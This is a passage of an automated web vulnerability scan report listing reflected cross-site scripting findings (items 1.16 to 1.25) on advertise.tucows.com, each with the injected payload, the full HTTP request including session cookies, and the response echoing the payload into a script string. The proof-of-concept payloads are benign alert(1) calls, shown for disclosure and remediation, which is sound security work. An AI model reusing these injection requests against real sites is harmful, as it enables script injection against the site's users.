Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/ajaxlib.js46a92"-alert(1)-"496766b8176";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.16. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4586a"-alert(1)-"2bd19196b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes4586a"-alert(1)-"2bd19196b6c/js/show_layer.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes4586a"-alert(1)-"2bd19196b6c/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.17. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac19"-alert(1)-"1250877226f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js5ac19"-alert(1)-"1250877226f/show_layer.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js5ac19"-alert(1)-"1250877226f/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.18. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 835b0"-alert(1)-"17c882840e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/show_layer.js835b0"-alert(1)-"17c882840e0 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/show_layer.js835b0"-alert(1)-"17c882840e0";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.19. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 624a4"-alert(1)-"3358fadd2b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes624a4"-alert(1)-"3358fadd2b6/js/signupin.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:21 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes624a4"-alert(1)-"3358fadd2b6/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.20. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b36c3"-alert(1)-"b205bb5d532 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/jsb36c3"-alert(1)-"b205bb5d532/signupin.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/jsb36c3"-alert(1)-"b205bb5d532/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.21. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28622"-alert(1)-"2ff515b5d95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/signupin.js28622"-alert(1)-"2ff515b5d95 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:48 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/signupin.js28622"-alert(1)-"2ff515b5d95";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.22. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42de8"-alert(1)-"7d8ee46561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes42de8"-alert(1)-"7d8ee46561/js/x_core.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes42de8"-alert(1)-"7d8ee46561/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.23. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b15de"-alert(1)-"e0f1f5c84c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/jsb15de"-alert(1)-"e0f1f5c84c9/x_core.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/jsb15de"-alert(1)-"e0f1f5c84c9/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.24. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd486"-alert(1)-"0da40994d37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/x_core.jscd486"-alert(1)-"0da40994d37 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/x_core.jscd486"-alert(1)-"0da40994d37";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.25. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fa22"-alert(1)-"0e7110e52dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

